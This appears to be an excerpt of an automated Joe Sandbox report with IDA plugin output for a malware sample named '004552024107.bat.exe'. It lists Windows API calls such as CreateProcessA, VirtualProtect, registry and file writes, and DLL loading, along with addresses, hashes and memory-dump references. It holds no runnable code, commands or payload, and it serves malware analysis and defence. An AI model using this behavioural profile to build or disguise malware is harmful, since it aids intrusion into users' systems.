                                            • Instruction Fuzzy Hash: A3F0F971C0024DDADB00DFA4D5487DEBBB4AF04305F00802AD841B6280D7B882588B99
                                            APIs
                                            • ShowWindow.USER32(00000000,00000000), ref: 00401F08
                                            • EnableWindow.USER32(00000000,00000000), ref: 00401F13
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: Window$EnableShow
                                            • String ID:
                                            • API String ID: 1136574915-0
                                            • Opcode ID: c55ef19b1d155cac422469f2929527eb9f7a60a7667ba4af7f0f003dd8d3c6d7
                                            • Instruction ID: ee44cb40e53ee45f72a0237e1ac7dd9bbdf9d48109a1395b289766a98c9c438f
                                            • Opcode Fuzzy Hash: c55ef19b1d155cac422469f2929527eb9f7a60a7667ba4af7f0f003dd8d3c6d7
                                            • Instruction Fuzzy Hash: C9E04872A082049FEF64EBA4FE9556F77F4EB50365B20447FE101F11C2DA7849428A5D
                                            APIs
                                            • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042BC90,00431800,00431800,00431800,?,00431400,00000000), ref: 0040594F
                                            • CloseHandle.KERNEL32(?), ref: 0040595C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: CloseCreateHandleProcess
                                            • String ID:
                                            • API String ID: 3712363035-0
                                            • Opcode ID: f2e48875b6aa7a4f82b92d961b6a232b94f4984d6ef5c684ccb1095c4447d295
                                            • Instruction ID: 59d3833cbd0ccaca5dcead9257bf18f7f56651039fadea8639d530792baa2c48
                                            • Opcode Fuzzy Hash: f2e48875b6aa7a4f82b92d961b6a232b94f4984d6ef5c684ccb1095c4447d295
                                            • Instruction Fuzzy Hash: 4DE09AB4A00209BFFB109F65AD09F7B776CE704714F418425B914F2151EB7498148A7C
                                            APIs
                                            • GetModuleHandleA.KERNEL32(?,00000000,?,0040351A,0000000C), ref: 004066C7
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 004066E2
                                              • Part of subcall function 00406647: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040665E
                                              • Part of subcall function 00406647: wsprintfA.USER32 ref: 00406697
                                              • Part of subcall function 00406647: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004066AB
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                            • String ID:
                                            • API String ID: 2547128583-0
                                            • Opcode ID: 6364b50fcd8a78884de1a109c3061c8e2e734accc18c0610f9b5885e266cf418
                                            • Instruction ID: a472cff2ba870c31c69f4352ad77424fb7bed112d4ffd52c95bf20a34481097e
                                            • Opcode Fuzzy Hash: 6364b50fcd8a78884de1a109c3061c8e2e734accc18c0610f9b5885e266cf418
                                            • Instruction Fuzzy Hash: BAE08C73A04210ABD610A6709E0883B73ACAF897413030C3EF952F2240DB3ADC32966E
                                            APIs
                                            • GetFileAttributesA.KERNELBASE(00000003,00402F71,C:\Users\user\Desktop\004552024107.bat.exe,80000000,00000003,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E24
                                            • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E46
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: File$AttributesCreate
                                            • String ID:
                                            • API String ID: 415043291-0
                                            • Opcode ID: 4c035aff046b4d43788645f88f630755698ea216f1f6cd5eefec511dda558379
                                            • Instruction ID: 0febe3887fb1e567d40345103610fd6f3e8d71b3c6328ccb34cdb50f288ecb70
                                            • Opcode Fuzzy Hash: 4c035aff046b4d43788645f88f630755698ea216f1f6cd5eefec511dda558379
                                            • Instruction Fuzzy Hash: 23D09E31254301AFEF099F20DE16F2E7AA2EB84B00F11952CB682A41E0DA7158299B15
                                            APIs
                                            • CreateDirectoryA.KERNELBASE(?,00000000,004033CB,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004058F7
                                            • GetLastError.KERNEL32(?,00000008,0000000A,0000000C), ref: 00405905
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: CreateDirectoryErrorLast
                                            • String ID:
                                            • API String ID: 1375471231-0
                                            • Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                            • Instruction ID: 226d66ac6a6a747d722d053d5b09978fff7ae735be90135577c6d3bd4ef0b281
                                            • Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                            • Instruction Fuzzy Hash: F9C04CB120490ADED6505B319F0971B7A51AB50751F175839A586E40A0DB348455DD2E
                                            APIs
                                            • EnumWindows.USER32(00000000), ref: 6D0E2B87
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1269749952.000000006D0E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D0E0000, based on PE: true
                                            • Associated: 00000000.00000002.1269707159.000000006D0E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000000.00000002.1269794266.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000000.00000002.1269831918.000000006D0E6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6d0e0000_004552024107.jbxd
                                            Similarity
                                            • API ID: EnumWindows
                                            • String ID:
                                            • API String ID: 1129996299-0
                                            • Opcode ID: ff4177d29350a4d9babd56d0e992c297619ef65db1d0cdc3160ca5fff59e8cc9
                                            • Instruction ID: fa01b396eb0a013fbdf81c7325cecaea8aca0e96fc6635ff15f47add4cc3ced9
                                            • Opcode Fuzzy Hash: ff4177d29350a4d9babd56d0e992c297619ef65db1d0cdc3160ca5fff59e8cc9
                                            • Instruction Fuzzy Hash: 01419076908206EFEF30DF75D889BAD37B4FB06798F148C29E605C7214C73899819B91
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: wsprintf
                                            • String ID:
                                            • API String ID: 2111968516-0
                                            • Opcode ID: 27d70afe983ce046a9cdbd576e9bb3ab08da78768c3b3dac89c271fd87d57e25
                                            • Instruction ID: c5fbe62f9b4e2cb89eed07bb10574c4b4a04671343a68c93ee4f329e73b59f15
                                            • Opcode Fuzzy Hash: 27d70afe983ce046a9cdbd576e9bb3ab08da78768c3b3dac89c271fd87d57e25
                                            • Instruction Fuzzy Hash: 3521B530D04289EEDF318B6886586EEBBB09F01314F14407FE4D1B72E2C6BC8985CB69
                                            APIs
                                            • MoveFileA.KERNEL32(00000000,00000000), ref: 004016AA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: FileMove
                                            • String ID:
                                            • API String ID: 3562171763-0
                                            • Opcode ID: 01db277db8653d624179d7b600e08ca7f67f5e45fdde97e81b8b39cbf95d4e5b
                                            • Instruction ID: 67493920040547a329b99de5d89bb6d269ebd8b6645208cc7e8d7a7b283b3978
                                            • Opcode Fuzzy Hash: 01db277db8653d624179d7b600e08ca7f67f5e45fdde97e81b8b39cbf95d4e5b
                                            • Instruction Fuzzy Hash: 09F0B431608125A7DF20BB765F5DE5F52A49B41378B20423BF212B21D1DABDC643856E
                                            APIs
                                            • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402776
                                              • Part of subcall function 004061EB: wsprintfA.USER32 ref: 004061F8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: FilePointerwsprintf
                                            • String ID:
                                            • API String ID: 327478801-0
                                            • Opcode ID: d0d9330acd65b2e867353bc74e86739eab35bf528f3ad37c96d6fee4195676f1
                                            • Instruction ID: 00adb5ebf99275c5c47ff66d1c826bee854e75ad94e87541b3f98b02de3c6d9f
                                            • Opcode Fuzzy Hash: d0d9330acd65b2e867353bc74e86739eab35bf528f3ad37c96d6fee4195676f1
                                            • Instruction Fuzzy Hash: E3E09272A04104AFDF50FBA4AE49DAF76B8EB40359B10043FF202F00C2CA7C4A538A2D
                                            APIs
                                            • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 00402402
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: PrivateProfileStringWrite
                                            • String ID:
                                            • API String ID: 390214022-0
                                            • Opcode ID: 3326b8378841c5f3540bed9b182ec42c057636b7d1278427695ffb5e145c9da6
                                            • Instruction ID: f24de8215b53ecbcf80a61348f6bfc7870897c54b3e6c90e9d08f7162164e460
                                            • Opcode Fuzzy Hash: 3326b8378841c5f3540bed9b182ec42c057636b7d1278427695ffb5e145c9da6
                                            • Instruction Fuzzy Hash: 9DE04F3160413A6BEB6036B11F8D97F2159AB84314B14053EBA11B62C6D9FC8E8352A9
                                            APIs
                                            • RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402D0F,00000000,?,?), ref: 0040616A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                            • Instruction ID: bbdc12591f07ec5b960d4a172b59ed2570ed34ba37628b65f55bcc9503456b15
                                            • Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                            • Instruction Fuzzy Hash: 7AE0E6B2020109BEEF099F60DC1AD7B772DE708310F01492EFA06D4151E6B5E9705634
                                            APIs
                                            • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403343,00000000,0041D440,000000FF,0041D440,000000FF,000000FF,00000004,00000000), ref: 00405EDB
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: FileWrite
                                            • String ID:
                                            • API String ID: 3934441357-0
                                            • Opcode ID: 11d7c7005d0d3054af3b9be2f3a82004ed33d4240877e49ff836af06555e7eff
                                            • Instruction ID: 0d77a24040528495e1d5683a333844bda4a24a81b27895c3293bddb668a77566
                                            • Opcode Fuzzy Hash: 11d7c7005d0d3054af3b9be2f3a82004ed33d4240877e49ff836af06555e7eff
                                            • Instruction Fuzzy Hash: 20E0EC3221065EABDF509F55DC00EEB7B6CEB05360F004837F965E2150D631EA219BE9
                                            APIs
                                            • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040338D,00000000,00000000,004031B7,000000FF,00000004,00000000,00000000,00000000), ref: 00405EAC
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            • Opcode ID: 62c77d97b5b576e4a72063145ecbe95ee4dab9ee0079c0f8f42f41321a19b9da
                                            • Instruction ID: c4f2c5db2c8838af9825f3b875f3a0ad88d5b51994199861a780369f0be58439
                                            • Opcode Fuzzy Hash: 62c77d97b5b576e4a72063145ecbe95ee4dab9ee0079c0f8f42f41321a19b9da
                                            • Instruction Fuzzy Hash: E4E04F32210619ABDF109F60DC04EAB3B6CEB00351F000432F954E2140D230E9118AE4
                                            APIs
                                            • VirtualProtect.KERNELBASE(6D0E504C,00000004,00000040,6D0E503C), ref: 6D0E29CF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1269749952.000000006D0E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D0E0000, based on PE: true
                                            • Associated: 00000000.00000002.1269707159.000000006D0E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000000.00000002.1269794266.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000000.00000002.1269831918.000000006D0E6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6d0e0000_004552024107.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID:
                                            • API String ID: 544645111-0
                                            • Opcode ID: 06b524c147e718555c0ac92673aff08202c30bcbe3fbfa4c701fb57e45f9edd8
                                            • Instruction ID: 9b031acb12027e9146d3140ceafc7b0525319e292111ec8892d20d77cb3eb8c6
                                            • Opcode Fuzzy Hash: 06b524c147e718555c0ac92673aff08202c30bcbe3fbfa4c701fb57e45f9edd8
                                            • Instruction Fuzzy Hash: D2F0A5B8904281DEDBA0CF38844C72D3BF0BB1AB94B104D2AF36CD6289E33440448F91
                                            APIs
                                            • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402440
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: PrivateProfileString
                                            • String ID:
                                            • API String ID: 1096422788-0
                                            • Opcode ID: 2bf3f178d14cd4560723ce1317423526718b1f73ef5608a9eed72cfac383f117
                                            • Instruction ID: 16d05768d70be94792168112439c0a82a49a1a045ba9b991e9e4b5323ac17763
                                            • Opcode Fuzzy Hash: 2bf3f178d14cd4560723ce1317423526718b1f73ef5608a9eed72cfac383f117
                                            • Instruction Fuzzy Hash: 2CE04F3190821DBAEB007FA08F09AAD2A69AF01720F10002AFA507A0D1E6B98583971D
                                            APIs
                                            • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,004061A1,?,?,?,?,00000000,?), ref: 00406137
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
